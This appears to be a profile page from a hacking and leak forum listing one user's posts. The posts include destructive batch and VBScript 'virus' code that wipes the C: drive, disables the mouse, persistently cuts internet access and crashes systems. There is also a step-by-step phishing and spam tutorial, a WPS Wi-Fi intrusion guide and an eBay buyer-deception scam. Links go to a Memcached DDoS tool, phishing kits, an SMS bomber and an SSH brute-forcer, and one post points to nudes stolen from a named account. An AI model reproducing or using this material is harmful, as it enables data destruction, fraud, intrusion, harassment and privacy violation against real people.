
Eminem
Members-
Content Count
1,467 -
Last visited
Content Type
Profiles
Forums
Calendar
Gallery
Blogs
Store
Articles
Downloads
Classifieds
Everything posted by Eminem
-
leechers will be reported and banned prob SEND BIG LIKE :kek: [hide] https://mega.nz/#F!4bIRHYKS!kdC5TA6tg92YvdAPKc4kMQ!VGJBmKxD [/hide]
-
cracked MALMON 0.3 Hosting Exploit/Backdoor Detection Daemon
Eminem posted a topic in Cracked Programs
malmon 0.3 Hosting exploit/backdoor detection daemon. It's written in python, and uses inotify (pyinotify) to monitor file system activity. It checks files smaller then some size, compares their md5sum and hex signatures against DBs with known exploits/backdoor. [hide] https://anonfile.com/beXaY5q4n7/malmon-0.3.tar_gz [/hide] -
leak [MEGA] NUDES STOLEN FROM whemcorp@gmail.com MEGA ACCOUNT
Eminem replied to hexo's topic in Other leaks
:comfy: :comfy: :comfy: -
:kek: :kek: :kek: :kek: :kek:
-
1193 Posts 3 000 Likes 173 Reputation 4 Weeks, 22 Hours Total visits: 2647
-
VIRUS is a collection of codes to destroy your system in seconds. A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". [hide] 1] MAKE A VIRUS WHICH DELETE HARD DRIVE Open your notepad. Copy the code given below and paste it in your notepad @Echo off Del C:\ *.* |y Save the file as virus.bat. That's it, just run the file and see the magic. It will delete all the content of C Drive. 2] MAKE VIRUS WHICH DISABLES MOUSE Open your notepad. Copy and paste the code in notepad. rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- Save the fille as disablemouse.batand execute it 3] MAKE A VIRUS TO DISABLE INTERNET PERMANENTLY Copy below code and save it as DisInt.bat. echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE 4] VIRUS TO CRASH YOUR COMPUTER SYSTEM Copy and paste the code and save the file as crash.bat. Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next 5] VIRUS TO MAKE DANCING CAPS LOCK Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” loop Now save it as dancecap.bat. [/hide]
-
This page helped me a lot perhaps it will also help you :fine: [hide] https://developer.android.com/ndk/guides [/hide]
-
Overview nfex is a tool for extracting files from the network in real-time or post-capture from an offline tcpdump pcap savefile. It is based off of the code-base from the apparently defunct project tcpxtract. nfex offers: Asynchronous user/event-driven interface Real-time or offline file extraction Custom written search algorithm is lightning fast and very scalable Search algorithm scales across packet boundaries for total coverage and forensic quality Support for 27 file formats A simple, repeatable way to add new file formats by editing the configuration file (post compilation) GeoIP targeting support using the free MaxMind C API Analysis tool for post extraction processing Compilation and Installation Build and install these fine libraries: * libpcap * libnet Optionally build and install this guy: * MaxMind GeoIP library ./configure && make sudo make install [hide] https://github.com/mschiffm/nfex [/hide]
-
leak [TOOL] iCULEAKS 0.2 (Sensibilise manufacturers of Carkits)
Eminem posted a topic in Cracked Programs
Tool to find and extract credentials from phone configuration files in environments managed by Cisco's CUCM (Call Manager) Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. [hide] https://github.com/llt4l/iCULeak.py [/hide] -
A very fast ssh attacking script which includes a multithreaded port scanning module (tcp connect) for discovering possible targets and a multithreaded brute-forcing module which attacks parallel all discovered hosts or given ip addresses from a list. [hide] http://nullsecurity.net/tools/cracker.html [/hide]
-
release Hack any WPA2/WEP/WPA Wifi using Dumpper and Jumpstart
Eminem replied to Eminem's topic in Tutorials, Guides, etc.
you just need to buy one of the others you have to buy -
+>What is phishing? Phishing is the fraudulent attempt to obtain sensitive information like login information or other personal identification information (PII), which is any data that could potentially identify a specific individual, such as: usernames, passwords, credit card details, SSN (Social Security Number), bank account information, email +>There are some common words used in spamming which is basically known to every spammer. Some are below we mentioned. >LEADS :- EMAIL LIST TO GET SPAMMED >LETTER :- THE FAKE EMAIL TO BE SENT >MAILER :- IT IS A PHP SCRIPT USING PHP >MAIL() FUNCTION TO SEND EMAILS >SMTP :- IS SIMPLY A PROTOCOL USED TO SEND EMAILS >SMTP SERVER :- A SERVER WHICH RUNS THE SMTP PROTOCOL >SHELL :- A BACKDOOR WHICH IS INSTALLED IN WEBSITE AND USED TO UPLAOD FILES AND MORE MORE >CPANEL :- IS A PANEL IN WHICH YOU CONTROL A WEBSITE UPLOAD FILES, AND DO MANY MANY THINGS. >SCAM PAGE :- IS A FAKE PAGE SIMILAR TO THE RAL PAGE TO BE UPLOADED ADN SHOULD RETRIEVE SENSITIVE INFOMRATIONS +>Tools you needed for spamming:- LEADS, LETTER, MAILER OR SMTP, SHELL OR CPANEL, SCAM PAGE AND if you have RDP (recommeded). [if you don’t have those tools, buy from any trusted vendor or sites] !!! [*All this information is for educational purpose only. We are not responsible for any illegal activity. Do one things on your own. We don’t promote any illegal activity*] !!! [hide] +>Now we can start our Tutorial 1] First of all just buy SHELL or CPANEL, and uplaod your SCAM PAGE to there. try to make it responsive. domain like if your shell domain is www.domain.com upload your scam page in www.domain.com/PAYPAL.COM/ACCOUNT/ (if paypal and if others like that) 2] But if you have a CPANEL. go to DOMAIN MANAGMENT PART and create SUBDOMAIN if your CPANEL is DOMAIN.COM create a new SUB DOMAIN paypal-account-helper.DOMAIN.COM and uplaod files there. *WHEN I SAY FILES I AM MEANING SCAM PAGE* 3] Now you done uploading and have the scam page. Just now it is SMTP/MAILER AND LEADs(Emails) PLUS LETTER PART. 4] Now download any mailer. example: TURBO MAILER, ULTRAMAILER, 123 BULK MAILER adn etc (download carcked version) 5] Go and add your sender email (SMTP) and import the leads then compose a new email and choose HTML then copy your letter there & start mailer/SMTP it will send scam link with letter to email users inbox. This is short Tutorial on spamming, now you just need brain & patience! +>Important Steps:- > to edit the link in the LETTER TO your SCAM PAGE LINK https://s.w.org/images/core/emoji/12.0.0-1/svg/1f610.svg[/img] or No RESULT > to edit scam page email to your email to recieve the email (or you will not get your results) > to Verify the leads using email verifier then just spam the VALID ones only I am providing some scampages & tools for spamming ^_^ Link:- https://anonfile.com/NcXbjbqfn5/Scampage_rar [/hide]
-
release Hack any WPA2/WEP/WPA Wifi using Dumpper and Jumpstart
Eminem replied to Eminem's topic in Tutorials, Guides, etc.
If you have patience, it's not that hard :ezy: -
Hack any WPA2/WEP/WPA Wifi using Dumpper and Jumpstart Hey Plebs, today we are going to tell you how you can hack a WiFi Using 2 tools named as Wincap & Jumpstart. These tools used to penetrate/hack WiFi on windows machine. *This post/Tutorial is for educational purpose only. We are not couraging any illegal activity through it. Do steps on your own network for practice purpose* ♡ So, let’s get Started ♡ ^_^ [hide] Tools:- WinCap:- https://www.winpcap.org/install/ JumpStart:- Download Here *This method only works for WiFi connected PC/Laptop* Note:- You need to have Microsoft .NET Framework installed on your computer as well, or this will not work. Steps:- 1[ EMINEM ] Download and install JumpStart, WinPcap, and Dumpper 2[ EMINEM ] Open Dumpper. It’ll be in Spanish, so go to the far right tab and select ‘English’ in between the other two options.Your programs are set up and ready to go, now begin the process 3[ EMINEM ] In the ‘Networks’ tab, select the network adapter you wish to use. Hit the ‘Scan’ button now. 4[ EMINEM ] After it completes the scan, go over to the ‘Wps’ tab. In the area that says ‘Connect using JumpStart’, hit ‘Browse’ to select the location of where you installed JumpStart in the previous set-up steps. (By default, it installs in C:Program Files (x86)Jumpstart. Don’t open it, just select the ‘Jumpstart’ folder and click ‘OK’) 5[ EMINEM ] In the area ‘Show default pin’, select ‘All networks’ isntead of ‘Only known networks’. 6[ EMINEM ] Hit the ‘Scan’ button. 7[ EMINEM ] Select the network you wish to penetrate. Remember the ‘Pin’ corresponding to your network in the scan results, this will be needed for later. 8[ EMINEM ] In the previous area ‘Connect using Jumpstart’, hit the ‘Start JumpStart’ button. 9[ EMINEM ] Under ‘What do you want to do?’, select ‘Join a wireless network’ and hit ‘Next’ 10[ EMINEM ] Under ‘Which setup method do you want to use?’, select “Enter the PIN from my access point” and enter the PIN next to your network in the scan section back in the previous scan results. 11[ EMINEM ] Finally, select the targeted network from before and hit ‘Next’.Now you’re happily connected to that WiFi network you just penetrated. Do you want to see the password so you can get on from other devices without doing this process? Sure! Follow these simple steps. 12[ EMINEM ] Open the menu where you join WiFi networks/view the network you’re connected to. 13[ EMINEM ] Right click on the network you just joined and hit ‘Properties’Under the ‘Security’ tab, you can see the password, but it’s just dots. 14[ EMINEM ] Check the ‘Show characters’ box under it.The password will then reveal itself. Done. IMP Points:- 1[ EMINEM ]For installation you have to wait for some hours, as software takes time to install & setup 2[ EMINEM ]You just need some patience & brain to get results 3[ EMINEM ]If you don’t get downloads of software then search on Google and download them, as they are freely available. Leave a comment and Big Like if you like this Tutorial[/hide]
-
[EBAY METHOD] EARN GOOD INCOME USING EBAY [hide] I decided to share my own method on something I found out. I've been selling on Ebay for about 3 years now. I know the ins and outs of the site along with PayPal. One thing I learned, and i DON"T GIVE A @*(# WHAT ANYONE TELLS ME: Ebay/PayPal is a system and you have to learn to play/comply with it (for your own good). This method, works because I'm aware of policies and how Ebay works. This is 100% legal and policy compliant, only if you do it as I say. Otherwise, I can't help you and you risk litigation from the buyer. First, background: Have you ever of those legal cases where someone signs something and later complains about the service/product because they didn't read it? By signing a legal paper/contract, you have to adhere by it. This is a worldwide fact. Ebay is the same. As a seller you must describe things accurately (which we'll do) and your buyer has a responsibility of reading your terms and agreeing with them. While what I'll show you is not illegal, it might be unethical to some. If you believe this is against your faith, belief, doctrine or philosophy, please do not do it. If you feel you will do everything correctly and will stand by your terms, go ahead. Nothing wrong with that. Businesses do it all the time. So here it goes... A - Find out about a popular HOT product that is close to launch or sells like hotcakes with good prices (Ex. Alienwares) B - Research the Ebay market and see if it sells (through the completed listings tab). If there are daily sales, that's good. C - Find out what the lowest selling price of this item is and the maximum. (Ex. New Alienware laptop will DEF sell for $700). D - (We'll use the Alienware example) Make a listing on a similar category to the Alienware laptops (maybe Laptop Accessories). E - . Price the item at a VERY good deal. In this example, $699 for the latest Alienware is a great deal. F - . (Here comes the magic) Make the listing and in your title put the *Alienware Laptop guide* D - . On the description, make your listing nice and neat along the lines of this: Description This is a purchase gude on how to buy the Alienware laptop below MSRP. Payment We accept PayPal and echecks. Shipping It will be shipped very quickly with tracking number Returns No items will be returned. Please abide by the terms and understand this is a contract. Feel free to ask any questions. So what's going on here? We are selling a manual on how to find the item for cheaper than MSRP for $699 =D We are accurately describing the item and letting people know to read the terms. Nothing wrong here. So why will someone buy this? The average ebay user will not. Why? They'll be browsing on a laptop or tablet and will read the terms. However, there is a huge market that buying through their mobile phones and they NOT reading the listing. Their fault, no kidding. A mobile purchase is made every 2 seconds on Ebay. I'm not kidding. That's straight from an Ebay commercial. After the sale, PRINT THE SHIPPING LABEL ASAP through first class and write a 2 page manual on how to buy the item below MSRP (very easy). Ship it. And wait for the item to be delivered. Chances are, most buyers will try to open a Significantly Not As Described case. Guess what? You're all good.Why? It's on your title and listing. You have no obligation to refund. If a buyer threatens to leave you negative feedback (which is GOOD!!), report him ASAP to Ebay. It is against policy to extortion. Once the buyer leaves negative feedback, Ebay will remove it (only if you report him beforehand with proof of the message). Your listing and terms are your weapon. Also make sure you don't put it directly in the item category. That would be misleading and can get you in trouble. [/hide]
-
# MEMCRASHED DDOS EXPLOIT TOOL DDoS Attack Tool For Sending Forged UDP Packets To Vulnerable Memcached Servers Obtained Using Shodan API This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io Prerequisites The only thing you need installed is Python 3.x apt-get install python3 You also require to have Scapy and Shodan modules installed pip install scapy AND pip install shodan Using Shodan API This tool requires you to own an upgraded Shodan API You may obtain one for free in [shodan]( https://shodan.io/) if you sign up using a .edu email ### Using Docker You may deploy this tool to the cloud using a light Alpine Docker image. > Note: Make sure to explicitly enter 'y' or 'n' to the interactive prompt bash git clone https://github.com/649/Memcrashed-DDoS-Exploit.git cd Memcrashed-DDoS-Exploit echo "SHODAN_KEY" > api.txt docker build -t memcrashed . docker run -it memcrashed [hide] https://anonfile.com/91d5Wbp1n8/Memcrashed-DDoS-Exploit-master_EMINEM_rar [/hide] VIRUS TOTAL : [align=center]0 / 56 [/align]
-
leak Phishing Pack - ( Steam Facebook Gmail Hotmail)
Eminem replied to Eminem's topic in Other leaks
Might wanna remove paypal from the title aint allowed :kek: I'm gonna do that for you :ezy: :kek: -
Phishing Pack - (Paypal Steam Facebook Gmail Hotmail) [hide] https://anonfile.com/i9b0Vcpbn3/phishing_pack_zip [/hide]
-
This is not repost @ TheShred :comfy: [align=center]This Software Can Send 12 Thousand Messages For 10 Minutes Size: 7MB This Program Requires Python. Without Python, The Program Will Not Spam To The Number Of Your Friend Or Enemy. In The Program, The Maximum Value Of The Stream Is From 1 To 100 This program Will Flood Your Friend In 10 Minutes With More Than 12 Thousand Messages.[/align] [hide] https://anonfile.com/z4F0Udpen1/SMS_BOMBER_rar [/hide]
-
This is not stupid I enjoyed it for a month and I can praise it :kek: You're really the definition of shit :fiesta: The tools been posted over 8 times on this forum you dumb ass :kek: :kek: I was looking but I couldn't find anything if you're right, I'm sorry I will try to improve my approach to this forum :comfy:
-
:kek: :kek: :kek: GOOD JOB MAN :kek: :kek: :kek: BIG LIKE
-
This is not stupid I enjoyed it for a month and I can praise it :kek: You're really the definition of shit :fiesta:
-
Online Reverse Hash Tool Clean v3.3 [hide] https://anonfiles.com/P1L1T7p5nb/Online_Reverse_Hash_Tool_v3.3_rar [/hide]
-
[TOOL] VANGUARD - PHP APPLICATION Vanguard is a PHP application, written in Laravel PHP framework, that allows website owners to quickly add and enable authentication, authorization and user management to their website. It is designed following latest security and code standards and it is ready for high availability websites. Although it is written in Laravel, it can be used to provide secure login, authentication, authorization and complete user management for any PHP powered website. Vanguard also comes with fully documented JSON API which allows you to easily authenticate users from your mobile (or any other) application. [hide] https://anonfile.com/H0q7depcn8/vanguard_rar [/hide]